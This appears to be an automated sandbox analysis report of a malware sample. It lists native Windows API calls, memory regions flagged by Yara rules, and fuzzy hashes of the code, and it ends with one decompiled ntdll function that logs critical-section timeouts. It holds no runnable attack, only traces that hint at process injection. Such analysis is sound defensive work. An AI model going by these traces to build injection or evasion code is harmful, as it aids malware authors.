                                          • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00F62D11,00002000,00003000,00000004), ref: 00F79F79
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.501334938.0000000000F60000.00000040.00000001.sdmp, Offset: 00F60000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateMemoryVirtual
                                          • String ID:
                                          • API String ID: 2167126740-0
                                          • Opcode ID: d8994ef335fb81c265a03167fa06d4f00b96a4e15c586b72665d9a71e1ac456d
                                          • Instruction ID: 8fe670c3895a82615a32c269c08e05749891f4491c45128d6bd21261616cc8a0
                                          • Opcode Fuzzy Hash: d8994ef335fb81c265a03167fa06d4f00b96a4e15c586b72665d9a71e1ac456d
                                          • Instruction Fuzzy Hash: 51F0F8B2200108AFDB14DF99CC81EEB77AAFF88750F158259FA4DA7241D634E911CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00F62D11,00002000,00003000,00000004), ref: 00F79F79
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.501334938.0000000000F60000.00000040.00000001.sdmp, Offset: 00F60000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateMemoryVirtual
                                          • String ID:
                                          • API String ID: 2167126740-0
                                          • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                          • Instruction ID: 3704726544815e59018cabc3d8f2b60e4ae57f45c416550da8fedbc775dcdc08
                                          • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                          • Instruction Fuzzy Hash: CBF015B2200208ABCB14DF89CC81EAB77ADEF88750F118149BE08A7241C630F810CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • NtClose.NTDLL(00F74D20,?,?,00F74D20,00000000,FFFFFFFF), ref: 00F79EB5
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.501334938.0000000000F60000.00000040.00000001.sdmp, Offset: 00F60000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: Close
                                          • String ID:
                                          • API String ID: 3535843008-0
                                          • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                          • Instruction ID: 4aaab624b0b9e0197cfbb3fe37c282ea962bbe2dfb2f8fdbcec4368955592ee6
                                          • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                          • Instruction Fuzzy Hash: 80D012752002146BD710EB98CC85E97776DEF44750F158455BA5C5B242C530F51086E1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.504196536.0000000004F70000.00000040.00000001.sdmp, Offset: 04F70000, based on PE: true
                                          • Associated: 0000000F.00000002.505096584.000000000508B000.00000040.00000001.sdmp
                                          • Associated: 0000000F.00000002.505143843.000000000508F000.00000040.00000001.sdmp
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: b439d9337f305bcfa59457a3b4163dc30009d2978986f2f57e2cd09f8165e7a2
                                          • Instruction ID: 101f975b4055d1edba64d44dff13325b249e4f617abb43ccdd3a4501e8b18e03
                                          • Opcode Fuzzy Hash: b439d9337f305bcfa59457a3b4163dc30009d2978986f2f57e2cd09f8165e7a2
                                          • Instruction Fuzzy Hash: E090027124100513F111615F4904727000997D02C6F91C412A4416598D9696D953B161
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.504196536.0000000004F70000.00000040.00000001.sdmp, Offset: 04F70000, based on PE: true
                                          • Associated: 0000000F.00000002.505096584.000000000508B000.00000040.00000001.sdmp
                                          • Associated: 0000000F.00000002.505143843.000000000508F000.00000040.00000001.sdmp
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: e73f9db465533c0808978999768e4e65da4dcf3df9ab8cecbda33c0c1c8fa5e1
                                          • Instruction ID: 48ee7ca5b53dbca024ea33a0aff4a87ac3976ad33b444c23f7371e6e0cc70ef3
                                          • Opcode Fuzzy Hash: e73f9db465533c0808978999768e4e65da4dcf3df9ab8cecbda33c0c1c8fa5e1
                                          • Instruction Fuzzy Hash: 76900261282042527545B15F48045274006A7E02C6791C012A5406990C8566E857E661
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.504196536.0000000004F70000.00000040.00000001.sdmp, Offset: 04F70000, based on PE: true
                                          • Associated: 0000000F.00000002.505096584.000000000508B000.00000040.00000001.sdmp
                                          • Associated: 0000000F.00000002.505143843.000000000508F000.00000040.00000001.sdmp
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: b6949b985f2fe242ce61dc56c428aa726561b0f60efd3f062e0a6c28ba757747
                                          • Instruction ID: fd78b5a634c80b9248509f2bb45aa3fced03348b00566933dc87c99109706176
                                          • Opcode Fuzzy Hash: b6949b985f2fe242ce61dc56c428aa726561b0f60efd3f062e0a6c28ba757747
                                          • Instruction Fuzzy Hash: 9F9002A1242001036105715F4814636400A97E0286B51C021E50065D0DC565D8927165
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.504196536.0000000004F70000.00000040.00000001.sdmp, Offset: 04F70000, based on PE: true
                                          • Associated: 0000000F.00000002.505096584.000000000508B000.00000040.00000001.sdmp
                                          • Associated: 0000000F.00000002.505143843.000000000508F000.00000040.00000001.sdmp
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 5aec5161679fc79b9f352ec7ed24629dd010f6b24c0d9e8f6ddac938b394e88d
                                          • Instruction ID: 9527816b0bdff73ed1feff45052fc2644f8aa315f5545aff1ef8489af8a44e39
                                          • Opcode Fuzzy Hash: 5aec5161679fc79b9f352ec7ed24629dd010f6b24c0d9e8f6ddac938b394e88d
                                          • Instruction Fuzzy Hash: E39002A138100542F100615F4814B260005D7E1386F51C015E5056594D8659DC537166
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.504196536.0000000004F70000.00000040.00000001.sdmp, Offset: 04F70000, based on PE: true
                                          • Associated: 0000000F.00000002.505096584.000000000508B000.00000040.00000001.sdmp
                                          • Associated: 0000000F.00000002.505143843.000000000508F000.00000040.00000001.sdmp
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 251fb5f0a386b96752f5a657331679c091d6f7e7d84ff4e7cc63b550487ea806
                                          • Instruction ID: d8175043a092746f085fd286afadf2814bd748b18f7760b016caba1329b0b093
                                          • Opcode Fuzzy Hash: 251fb5f0a386b96752f5a657331679c091d6f7e7d84ff4e7cc63b550487ea806
                                          • Instruction Fuzzy Hash: 5D900265251001032105A55F0B04527004697D53D6351C021F5007590CD661D8626161
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.504196536.0000000004F70000.00000040.00000001.sdmp, Offset: 04F70000, based on PE: true
                                          • Associated: 0000000F.00000002.505096584.000000000508B000.00000040.00000001.sdmp
                                          • Associated: 0000000F.00000002.505143843.000000000508F000.00000040.00000001.sdmp
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: f4b7969ed5b78c3857ea7ed2224ca4bf59eefcc9922658a1f1ebf256c41ad347
                                          • Instruction ID: eea357a0a4e2584d9a605cee86da9100da36bcfdd25d21f73e31d0a4c075ba18
                                          • Opcode Fuzzy Hash: f4b7969ed5b78c3857ea7ed2224ca4bf59eefcc9922658a1f1ebf256c41ad347
                                          • Instruction Fuzzy Hash: DD9002B124100502F140715F4804766000597D0386F51C011A9056594E8699DDD676A5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.504196536.0000000004F70000.00000040.00000001.sdmp, Offset: 04F70000, based on PE: true
                                          • Associated: 0000000F.00000002.505096584.000000000508B000.00000040.00000001.sdmp
                                          • Associated: 0000000F.00000002.505143843.000000000508F000.00000040.00000001.sdmp
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: c1ca946432aa35559b942f4adf404e8163b87c1de046f1c379882bb03c8971a2
                                          • Instruction ID: faf51e27412ecea44f68dc0a73ab59819f62475c2ace86087fd649b0c1c990ad
                                          • Opcode Fuzzy Hash: c1ca946432aa35559b942f4adf404e8163b87c1de046f1c379882bb03c8971a2
                                          • Instruction Fuzzy Hash: 1F90027124108902F110615F880476A000597D0386F55C411A8416698D86D5D8927161
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.504196536.0000000004F70000.00000040.00000001.sdmp, Offset: 04F70000, based on PE: true
                                          • Associated: 0000000F.00000002.505096584.000000000508B000.00000040.00000001.sdmp
                                          • Associated: 0000000F.00000002.505143843.000000000508F000.00000040.00000001.sdmp
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 5cf043bec13d89b965058f74213f94db14c951d32019f95f433b56be81dccf93
                                          • Instruction ID: 325b4ef94abf5bea302cf6f6cf9f557a910ba3ded7bb7c836fcaf6a7b02ebaf1
                                          • Opcode Fuzzy Hash: 5cf043bec13d89b965058f74213f94db14c951d32019f95f433b56be81dccf93
                                          • Instruction Fuzzy Hash: 7590027124100942F100615F4804B66000597E0386F51C016A4116694D8655D8527561
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.504196536.0000000004F70000.00000040.00000001.sdmp, Offset: 04F70000, based on PE: true
                                          • Associated: 0000000F.00000002.505096584.000000000508B000.00000040.00000001.sdmp
                                          • Associated: 0000000F.00000002.505143843.000000000508F000.00000040.00000001.sdmp
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: b5a142fdb0eb123765a185e820475554fc9b86b9a280ad7b307745d1e8ecdeae
                                          • Instruction ID: 86ea4c5f3f5554e1d389917d3ea92b4e7526c8e5adddc4d362e42d5561da5c80
                                          • Opcode Fuzzy Hash: b5a142fdb0eb123765a185e820475554fc9b86b9a280ad7b307745d1e8ecdeae
                                          • Instruction Fuzzy Hash: 0A90027124100902F180715F480466A000597D1386F91C015A4017694DCA55DA5A77E1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.504196536.0000000004F70000.00000040.00000001.sdmp, Offset: 04F70000, based on PE: true
                                          • Associated: 0000000F.00000002.505096584.000000000508B000.00000040.00000001.sdmp
                                          • Associated: 0000000F.00000002.505143843.000000000508F000.00000040.00000001.sdmp
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 8a028ab64bca542a35f8d90c2cae19fab5bed596e1d27087f854b1d084e934ca
                                          • Instruction ID: 3b107bedf77ede4d0504894f9a29d427951bc1481457d1bbb9affd0282483bad
                                          • Opcode Fuzzy Hash: 8a028ab64bca542a35f8d90c2cae19fab5bed596e1d27087f854b1d084e934ca
                                          • Instruction Fuzzy Hash: 7E90027124504942F140715F4804A66001597D038AF51C011A40566D4D9665DD56B6A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.504196536.0000000004F70000.00000040.00000001.sdmp, Offset: 04F70000, based on PE: true
                                          • Associated: 0000000F.00000002.505096584.000000000508B000.00000040.00000001.sdmp
                                          • Associated: 0000000F.00000002.505143843.000000000508F000.00000040.00000001.sdmp
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 23da830a4057d20bd610870fca6b84c4344ba07b0104e4e2983ecd0d243be2a4
                                          • Instruction ID: 78c603ed343295921495b44a4bf4e5c1ab3056278516af2a006966c1409f01ac
                                          • Opcode Fuzzy Hash: 23da830a4057d20bd610870fca6b84c4344ba07b0104e4e2983ecd0d243be2a4
                                          • Instruction Fuzzy Hash: 5B90026125180142F200656F4C14B27000597D0387F51C115A4146594CC955D8626561
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.504196536.0000000004F70000.00000040.00000001.sdmp, Offset: 04F70000, based on PE: true
                                          • Associated: 0000000F.00000002.505096584.000000000508B000.00000040.00000001.sdmp
                                          • Associated: 0000000F.00000002.505143843.000000000508F000.00000040.00000001.sdmp
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 491528015d1df48dd801df4790093aa53c93abeb7215088764c3d0cc55e23afc
                                          • Instruction ID: dd05676c0a0a07883f73cf577da323ce7fbd2a271e722d4e47a80428b4a42c60
                                          • Opcode Fuzzy Hash: 491528015d1df48dd801df4790093aa53c93abeb7215088764c3d0cc55e23afc
                                          • Instruction Fuzzy Hash: 2390027135114502F110615F8804726000597D1286F51C411A4816598D86D5D8927162
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.504196536.0000000004F70000.00000040.00000001.sdmp, Offset: 04F70000, based on PE: true
                                          • Associated: 0000000F.00000002.505096584.000000000508B000.00000040.00000001.sdmp
                                          • Associated: 0000000F.00000002.505143843.000000000508F000.00000040.00000001.sdmp
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: cb778114361953f03a893f625eeb1001d64304d6a8394a9799a25ab14142767a
                                          • Instruction ID: 785fa0c5067ebe7661ea3ea90812b350ffaff25500c07fc3503f5b7d4cb10af7
                                          • Opcode Fuzzy Hash: cb778114361953f03a893f625eeb1001d64304d6a8394a9799a25ab14142767a
                                          • Instruction Fuzzy Hash: ED90026925300102F180715F580862A000597D1287F91D415A4007598CC955D86A6361
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.504196536.0000000004F70000.00000040.00000001.sdmp, Offset: 04F70000, based on PE: true
                                          • Associated: 0000000F.00000002.505096584.000000000508B000.00000040.00000001.sdmp
                                          • Associated: 0000000F.00000002.505143843.000000000508F000.00000040.00000001.sdmp
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: b908d499ed2e97b1da4d8ae0eed7e0ce52d6f695de4a6cdebf0726382c97e520
                                          • Instruction ID: 97c77cfe45ccee7fbb0cb02099c28afc37f616ef96076278bbcc4a569b3be7f1
                                          • Opcode Fuzzy Hash: b908d499ed2e97b1da4d8ae0eed7e0ce52d6f695de4a6cdebf0726382c97e520
                                          • Instruction Fuzzy Hash: 0390027124100502F100659F5808666000597E0386F51D011A9016595EC6A5D8927171
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00F63AF8), ref: 00F7A09D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.501334938.0000000000F60000.00000040.00000001.sdmp, Offset: 00F60000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID: U
                                          • API String ID: 3298025750-3372436214
                                          • Opcode ID: fd6a2b2aed92f29c5d507c8bee11bcef5e009870ee05968a564e64aab02de800
                                          • Instruction ID: 8662a2b690bc7e65aa65c82df8e2434ffcdab4fb8e3ad5998c244f1b8aefff4e
                                          • Opcode Fuzzy Hash: fd6a2b2aed92f29c5d507c8bee11bcef5e009870ee05968a564e64aab02de800
                                          • Instruction Fuzzy Hash: E1F0E2716082547FD720EFA49C81EEB7B6CDF85B20F1584AAF98C9F247C530A50587E2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00F63AF8), ref: 00F7A09D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.501334938.0000000000F60000.00000040.00000001.sdmp, Offset: 00F60000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID: .z`
                                          • API String ID: 3298025750-1441809116
                                          • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                          • Instruction ID: fb90ae4f9eb3f3ac1b2f08f48f9e651dd5aaadebb12814ffff214de25ed1cfb9
                                          • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                          • Instruction Fuzzy Hash: F3E04FB12002086BD714DF59CC45EA777ADEF88750F018555FE0C57241C630F910CAF1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 00F6834A
                                          • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 00F6836B
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.501334938.0000000000F60000.00000040.00000001.sdmp, Offset: 00F60000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: MessagePostThread
                                          • String ID:
                                          • API String ID: 1836367815-0
                                          • Opcode ID: 4adf284a7a0c8eff105667c9da61a855bc41c97b858e751c65a6fdf532cb0eeb
                                          • Instruction ID: 59fb9e0893206519d3116a3a01b392e5b271b6d605874f628e5fd2a416957609
                                          • Opcode Fuzzy Hash: 4adf284a7a0c8eff105667c9da61a855bc41c97b858e751c65a6fdf532cb0eeb
                                          • Instruction Fuzzy Hash: AA01D831A802187BE720A6949C43FBE776C6B00B55F154159FF04BA1C1D6D8A90657E6
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 00F6834A
                                          • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 00F6836B
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.501334938.0000000000F60000.00000040.00000001.sdmp, Offset: 00F60000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: MessagePostThread
                                          • String ID:
                                          • API String ID: 1836367815-0
                                          • Opcode ID: 4a55148ff9da4d85293f36c1d21b3ca726a4155c96c158c46edfd0097c785396
                                          • Instruction ID: 7c87bdfe00666760bf670d405f09b73b2b4ee04b87962c60cdeee826a8690df7
                                          • Opcode Fuzzy Hash: 4a55148ff9da4d85293f36c1d21b3ca726a4155c96c158c46edfd0097c785396
                                          • Instruction Fuzzy Hash: 8401A731A802287BE720A6949C43FBE776C6B40F51F154159FF04BA1C1EAD8690666F6
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00F7A134
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.501334938.0000000000F60000.00000040.00000001.sdmp, Offset: 00F60000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: CreateInternalProcess
                                          • String ID:
                                          • API String ID: 2186235152-0
                                          • Opcode ID: 036ecc63bcd005bbcab80a9b3f0a43ff64fe6c05a20eb5be2c15438e78a80a0f
                                          • Instruction ID: 3d5fb126214fb132b57e2a2526e8ba2be33febffaa3fac6e7a499006d035de40
                                          • Opcode Fuzzy Hash: 036ecc63bcd005bbcab80a9b3f0a43ff64fe6c05a20eb5be2c15438e78a80a0f
                                          • Instruction Fuzzy Hash: F811DAB2200208ABDB14DF99DC81EEB37ADAF8C750F158259FA4DA7241C630E9118BA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00F7A134
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.501334938.0000000000F60000.00000040.00000001.sdmp, Offset: 00F60000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: CreateInternalProcess
                                          • String ID:
                                          • API String ID: 2186235152-0
                                          • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                          • Instruction ID: 7656a73721d5a56bc3a006e688a7d473632ca1e9613469b5a12b569d5334a721
                                          • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                          • Instruction Fuzzy Hash: 8501B2B2210108BFCB54DF89DC80EEB77ADAF8C754F158258FA0DA7241C630E851CBA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RtlAllocateHeap.NTDLL(00F74506,?,00F74C7F,00F74C7F,?,00F74506,?,?,?,?,?,00000000,00000000,?), ref: 00F7A05D
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.501334938.0000000000F60000.00000040.00000001.sdmp, Offset: 00F60000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                          • Instruction ID: 44ad86f76cc4cc6402dd678a135ae73ac218f37fe6f499a00bcd927ab0d30253
                                          • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                          • Instruction Fuzzy Hash: 18E01AB1200208ABD714DF59CC41EA777ADEF88650F118559BA085B241C530F9108AB1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,00F6F1A2,00F6F1A2,?,00000000,?,?), ref: 00F7A200
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.501334938.0000000000F60000.00000040.00000001.sdmp, Offset: 00F60000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: LookupPrivilegeValue
                                          • String ID:
                                          • API String ID: 3899507212-0
                                          • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                          • Instruction ID: 16b5e9bcf817b8f9fb6c70130540496054a13899399a42b54c6a885984b8d20d
                                          • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                          • Instruction Fuzzy Hash: CDE01AB12002086BDB10DF49CC85EEB37ADEF88650F018155BA0C67241C934E8108BF5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SetErrorMode.KERNELBASE(00008003,?,00F68CF4,?), ref: 00F6F6CB
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.501334938.0000000000F60000.00000040.00000001.sdmp, Offset: 00F60000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorMode
                                          • String ID:
                                          • API String ID: 2340568224-0
                                          • Opcode ID: e253f9d631215993c84dec7722cd7f53efe2cab4a5defbadf7eab7c24dcdace0
                                          • Instruction ID: 0bb4420a46357b2b15625a20f84e86c61cb4dd9ace1331141602dc65f79dea93
                                          • Opcode Fuzzy Hash: e253f9d631215993c84dec7722cd7f53efe2cab4a5defbadf7eab7c24dcdace0
                                          • Instruction Fuzzy Hash: 1FE02BB199420039FA207F706C03B473B484710720F194069E9A8BB283DA05D1055630
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SetErrorMode.KERNELBASE(00008003,?,00F68CF4,?), ref: 00F6F6CB
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.501334938.0000000000F60000.00000040.00000001.sdmp, Offset: 00F60000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorMode
                                          • String ID:
                                          • API String ID: 2340568224-0
                                          • Opcode ID: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
                                          • Instruction ID: e02fd44302daf80cb44f9e90d9143fbfb7a4e440d618894a7e5a15c8a5d21f27
                                          • Opcode Fuzzy Hash: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
                                          • Instruction Fuzzy Hash: 32D05E616903043AE610AAA49C03F2632896B44B10F494064FA48962C3D954E4004165
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.504196536.0000000004F70000.00000040.00000001.sdmp, Offset: 04F70000, based on PE: true
                                          • Associated: 0000000F.00000002.505096584.000000000508B000.00000040.00000001.sdmp
                                          • Associated: 0000000F.00000002.505143843.000000000508F000.00000040.00000001.sdmp
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: d9b43f7225f102851f5f17dbf315b690ea6f7628100e0c51d2f85c92bf27cdb3
                                          • Instruction ID: 2122a3a5c0b7131ab5e42ed079cb9a3a5bb101beddd0114d4c40b608cf8c4d00
                                          • Opcode Fuzzy Hash: d9b43f7225f102851f5f17dbf315b690ea6f7628100e0c51d2f85c92bf27cdb3
                                          • Instruction Fuzzy Hash: 9EB09BB1D414C5C5F711D7B54E08B37790177D0745F16C051D1021685A4778D492F6B5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          C-Code - Quality: 53%
                                          			E0502FDDA(intOrPtr* __edx, intOrPtr _a4) {
                                          				void* _t7;
                                          				intOrPtr _t9;
                                          				intOrPtr _t10;
                                          				intOrPtr* _t12;
                                          				intOrPtr* _t13;
                                          				intOrPtr _t14;
                                          				intOrPtr* _t15;
                                          
                                          				_t13 = __edx;
                                          				_push(_a4);
                                          				_t14 =  *[fs:0x18];
                                          				_t15 = _t12;
                                          				_t7 = E04FDCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                          				_push(_t13);
                                          				E05025720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                          				_t9 =  *_t15;
                                          				if(_t9 == 0xffffffff) {
                                          					_t10 = 0;
                                          				} else {
                                          					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                          				}
                                          				_push(_t10);
                                          				_push(_t15);
                                          				_push( *((intOrPtr*)(_t15 + 0xc)));
                                          				_push( *((intOrPtr*)(_t14 + 0x24)));
                                          				return E05025720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                          			}











                                          APIs
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0502FDFA
                                          Strings
                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0502FE2B
                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0502FE01
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.504196536.0000000004F70000.00000040.00000001.sdmp, Offset: 04F70000, based on PE: true
                                          • Associated: 0000000F.00000002.505096584.000000000508B000.00000040.00000001.sdmp
                                          • Associated: 0000000F.00000002.505143843.000000000508F000.00000040.00000001.sdmp
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                          • API String ID: 885266447-3903918235
                                          • Opcode ID: efd9e37d9e495a807bd453870d49073d990410387ddd479653a64c5135c3f5f1
                                          • Instruction ID: aa87f40852e598dbc3a6cb66e37b3f496e878f85fb6673de3aebad160212af71
                                          • Opcode Fuzzy Hash: efd9e37d9e495a807bd453870d49073d990410387ddd479653a64c5135c3f5f1
                                          • Instruction Fuzzy Hash: 5EF0F672240211BFEB212A45EC06F77BB6AEB44770F150314FA285A1D1DA62FC2096F4
                                          Uniqueness

                                          Uniqueness Score: -1.00%